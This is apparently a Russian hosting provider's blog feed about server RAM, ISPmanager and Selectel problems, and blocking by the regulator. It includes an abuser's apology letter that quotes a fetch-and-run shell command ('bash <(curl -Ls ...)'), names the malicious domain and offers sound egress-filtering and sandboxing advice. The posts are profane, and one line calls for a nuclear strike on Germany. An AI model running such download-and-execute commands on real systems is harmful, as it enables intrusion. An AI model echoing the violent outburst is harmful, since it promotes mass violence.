Питон не удаляется, однажды установил - навсегда страдай

начало
hosting.show/alice2k-hosting/dlya-kitaycev-nuzhno-sobirat-1-tb-ozu-servery-pohozhe-no-k-sozhaleniyu-takih-staryh-i-nenuzhnyh-poka-esche-net-no-v-2030-budut.html


Сайтов на питоне нет — я все удалил
Нет не одного питон процесса в списке процессов
Но увы — не удаляется.







Короче 1 процесс жрет 60 мб
1 ТБ озу сервер это 1000000 мб
/ 16000 процессов
допустим по 5 процессов на человека
16000/5 = 3200 аккаунтов

И это кстати хороший пример того что означает «слабый хостинг».
Вот я писал много раз про слабые облака или что-ниб еще.
Пришел наплыв заказов — продукт не справился. Так как там было 32 озу 128 озу и 16 озу и 16 озу всего лишь 4 сервера бомжа, для бесплатного то хостинга.
Но любой нормальный хостинг, например таймвеб или регру которые считают себя лидерами должен в запасе иметь думаю около 10 ТБ озу чтобы в случае чего не опозориться.
Тоже самое с ВДС я писал уже ранее

Я конечно своим проебом это не считаю — так как услугу бесплатного хостинга я и не планировал масштабировать. Но если бы я серьезно задумался сделать «хостинг сайтов» то только 10 ТБ озу запаса — только так.

нашел еще в тикетах, оказывается еще вчера написал челик который и распространил

начало интересного случая с дырявой ISPmanager
hosting.show/alice2k-hosting/dlya-kitaycev-nuzhno-sobirat-1-tb-ozu-servery-pohozhe-no-k-sozhaleniyu-takih-staryh-i-nenuzhnyh-poka-esche-net-no-v-2030-budut.html

I am writing to take full responsibility for the recent wave of service abuse that has impacted your platform. I am the person who initiated this situation.

Initially, I discovered a method that allowed for arbitrary command execution using Python on your servers. Without considering the potential consequences, I shared this finding within an online community. I severely underestimated the impact this would have, and I never intended for it to lead to widespread malicious activity.

To mitigate any further damage, I have now deleted all the content I posted regarding this method. I want to express my deepest and most sincere apologies for the significant disruption and trouble this has caused.

In an effort to help you secure your platform and make amends, I am providing a detailed analysis of the exploit and a set of actionable recommendations to block this and similar attacks in the future.

Technical Analysis and Recommendations

The attack relies on the ability to download and execute a remote shell script from within a user’s process. The core command being used is: bash <(curl -Ls [REMOTE_SCRIPT_URL]).

Here are several layered defense strategies to prevent this:

Immediate Mitigation: Network Egress Filtering

This is the fastest way to stop the current attack.

Action:
Block Specific Domain: Use your firewall to block all outbound traffic to the domain main.ssss.nyc.mn.
Default Deny Policy (Best Practice): Block all outbound internet access by default and only whitelist essential domains. This prevents attackers from simply moving their script to a new domain.

Core Solution: Restrict the Execution Environment

This is the fundamental, long-term solution.

Action:
Disable Dangerous Functions: In your Python environment, disable dangerous modules like subprocess, os.system, os.popen, etc.
Use Secure Sandboxing: Run user code within a heavily restricted sandbox (e.g., Docker with strict seccomp and AppArmor/SELinux profiles, or technologies like gVisor). The process should run as a low-privilege, non-root user.

Detection and Monitoring

This allows you to detect and respond to threats in real-time.

Action:
Monitor Process Creation: Log and alert whenever a user’s process spawns a shell or network utility (e.g., /bin/bash, curl, wget).
Monitor Network Connections: Log all outbound connections and alert on traffic to suspicious or unknown destinations.

Summary of Recommendations

Strategy: 1. Network Filtering
Implementation Method: Firewall rules to block specific outbound domains/IPs.
Impact: Immediate. Stops the current attack vector.

Strategy: 2. Environment Hardening
Implementation Method: Disable dangerous functions, use sandboxing (Docker, gVisor).
Impact: Strategic. The most robust long-term solution.

Strategy: 3. Detection & Monitoring
Implementation Method: Log and alert on suspicious process/network activity.
Impact: Proactive. Provides visibility for rapid response.

I once again apologize for my irresponsible actions. I hope this technical information is useful for your team and helps you strengthen your platform’s security.

Sincerely,

Я пишу, чтобы взять на себя полную ответственность за недавнюю волну злоупотреблений сервисами, которая затронула вашу платформу. Я являюсь лицом, инициировавшим эту ситуацию.

Изначально я обнаружил метод, позволяющий выполнять произвольные команды с использованием Python на ваших серверах. Не оценивая возможные последствия, я поделился этим открытием в онлайн-сообществе. Я сильно недооценил последствия этого и никогда не подразумевал, что это приведет к широкому распространению вредоносной активности.

Чтобы минимизировать дальнейший ущерб, я удалил весь опубликованный мной контент, касающийся этого метода. Хочу принести свои глубочайшие и самые искренние извинения за значительные сбои и проблемы, которые это вызвало.

Чтобы помочь вам защитить вашу платформу и исправить ситуацию, я предоставляю подробный анализ эксплойта и набор практических рекомендаций по блокированию этой и подобных атак в будущем.

Технический анализ и рекомендации

Атака основана на возможности загрузки и выполнения удаленного скрипта оболочки из процесса пользователя. Основная используемая команда: bash <(curl -Ls [URL_УДАЛЁННОГО_СКРИПТ]).

Вот несколько многоуровневых стратегий защиты для предотвращения этого:

Немедленное смягчение: Фильтрация исходящего сетевого трафика

Это самый быстрый способ остановить текущую атаку.

Действие:
Блокировка определённого домена: Используйте брандмауэр для блокировки всего исходящего трафика в домен main.ssss.nyc.mn.
Политика запрета по умолчанию (рекомендуемая практика): Блокируйте весь исходящий интернет-доступ по умолчанию и добавляйте в белый список только необходимые домены. Это не позволит злоумышленникам просто перенести свой скрипт в новый домен.

Основное решение: Ограничьте среду выполнения

Это фундаментальное долгосрочное решение.

Действие:
Отключите опасные функции: В вашей среде Python отключите опасные модули, такие как subprocess, os.system, os.popen и т. д.
Используйте безопасную песочницу: запускайте пользовательский код в строго ограниченной песочнице (например, Docker со строгими профилями seccomp и AppArmor/SELinux, или такими технологиями, как gVisor). Процесс должен запускаться от имени пользователя с низкими привилегиями, не являющегося пользователем root.

Обнаружение и мониторинг

Это позволяет обнаруживать угрозы и реагировать на них в режиме реального времени.

Действие:
Мониторинг создания процессов: регистрируйте и оповещайте о каждом запуске пользовательским процессом оболочки или сетевой утилиты (например, /bin/bash, curl, wget).

Мониторинг сетевых подключений: регистрируйте все исходящие соединения и оповещайте о трафике, направленном на подозрительные или неизвестные адреса.

Резюме рекомендаций

Стратегия: 1. Фильтрация сети
Метод реализации: правила брандмауэра для блокировки определенных исходящих доменов/IP-адресов.
Воздействие: немедленное. Блокирует текущий вектор атаки.

Стратегия: 2. Укрепление среды
Метод реализации: Отключение опасных функций, использование изолированной среды (Docker, gVisor).
Воздействие: Стратегическое. Наиболее надёжное долгосрочное решение.

Стратегия: 3. Обнаружение и мониторинг
Метод реализации: Регистрация и оповещение о подозрительной активности процесса/сети.
Воздействие: Проактивное. Обеспечивает прозрачность для быстрого реагирования.

Ещё раз прошу прощения за свои безответственные действия. Надеюсь, эта техническая информация будет полезна вашей команде и поможет вам укрепить безопасность вашей платформы.

С уважением,

У ISPmanager снова утечки багов - лимиты в панели не работают

В прошлый раз абузили Xray
hosting.show/alice2k-hosting/ispmanager-ne-rabotayut-limity.html

Теперь еще какую-то Node-js парашу


Т.к. в супер крутой ПЛАТНОЙ СУКА панели ОТСУТСВУЮТ ЛИМИТЫ НА ЭТИ НОВОМОДНЫЕ ХУЙНИ

пришлось их нахуй отключить
hosting.kitchen/yacolo-com/udalyaem-nenuzhnye-funkcii-kotorye-ispolzuyutsya-tolko-dlya-zloupotrebleniya-chtoby-polozhit-ves-server-cherez-utechku-ozu-v-sovremennoy-ispmanager-6.html

  1. ISPmanager 4 pro — была самая охуенная там были четкие функции и четкие настройки
  2. ISPmanager 5 lite — была охуенная не было никаких лимитов, но и не было говно функций лишних
  3. ISPmanager 6 host (бывшая max lite которую зачем-то превратили в host) — зачем-то добавила в панель для сайтов какой-то VPN, зачем-то сделала там функукции которые обычно на VDS работают — и стала говно панелью

у селектел все таки есть какая-то проблема с новыми серваками и vlan

я сам когда покупал ноды 9950x уже дважды столкнулся с тем, что покупаешь сервер и ставишь ОС — нет сети.
не важно ставишь ли ты на свою VLAN или на дефолтный IP — сети нет.

а бывает купишь сервер и сразу работает.

так вот в МСК например у меня «само» заработало только спустя 5 дней.
хотя в тикетах там мне утверждали что они ничего не делали.
я тогда списал это на то, что типо «сеть куплена недавно новая может не везде анонсировалась»

но сейчас то сеть не новая
а история повторяется уже с другим человеком


это не случайность
а значит закономерность

такое ощущение что серверы просто новые и установлены в стойки и еще не разу никем не покупались
и там что-то с сетью — недоделано просто.

в ОВХ когда новинки заводят там тоже постоянно баги, поэтому в ОВХ лучший сервер это когда он из отказа прилетает, а не абсолютно новый.

короче из-за того что глобализацию все разрушают - задумка VMmanager6 тоже разрушилась

типо одна панель для множества стран или кластеров

РНК разрушил саму идею панели VMmanager

теперь нужно так же делать снова по старинке
как я писал про почту когда-то

теперь нужно делать так абсолютно каждую сущность с которой приходится работать — увеличивать кол-во, увеличивать расходы.
если дома мы раньше покупали 2-3 интернет провайдера
то теперь еще и 2-3 VPN
то теперь еще и 2-3 разных VPN с разными протоколами, т.е. я например не умею на одном сервере делать разные протоколы
плюс еще и RDP так же нужно 2-3
итого +20000р мес расхода — тупо для того, чтобы работать с интернетом
но вы думаете это остановит фанатов интернета? нихуя подобного. мы будем и сотни тысяч тратить — но работать нам никто не сможет запретить, не один уебок.

короче абсолютно все нужно дробить на части
и создавать десятки сотни тысячи сущностей

в европе далбоебы например с санкциями которые — они тоже провоцируют точно такой же подход
вместо того чтобы работать честно и копить кучу услуг ради доверия и скидок — приходится из-за их точно такого же наплевательского отношения как и у нас в РФ РНК хуярит все подряд — точно так же приходится делать десятки сотни тысячи сущностей

приходится все УСЛОЖНЯТЬ
только так можно качественно работать
вот к чему приводят ваши блокировки — к тому что все становится СЛОЖНЕЕ и неудобнее и МЕНЕЕ безопаснее



например в одной из локаций сегодня банится


лично я ничего никуда переносить не собираюсь
каждому недовольному буду просто давать контакты РНК пусть им гадит — это называется честно

для разработчиков VMmanager — даю совет, необходимо сделать так, чтобы панель VMmanager могла одновременно работать на 10 разных серверах в 10 разных странах. такое возможно? вот — за этим будущее.
потому что даже если я ее перенесу в РФ, то зарубежный клиент не сможет туда войти — это ведь тоже самое. а нормальный хостер должен быть ЧЕСТНЫМ ДЛЯ ВСЕХ, ибо он не расист как Хетзнер или РНК

зачем вообще всю эту хуйню делать? вам что нравится бессмысленная работа?
ЗАПУСТИТЕ УЖЕ ЯДЕРНЫЙ УДАР ПО ГЕРМАНИИ которая вводит санкции и дело с концом
решите проблему раз и навсегда

баг ispmanager - подтверждение или верификация - тупо не работают




получается блокировка РНК может полностью лишить пользователей ISPmanager доступа на их сервер
напомню порт 1500 блокируется даже на РФ серверах например на selectel сегодня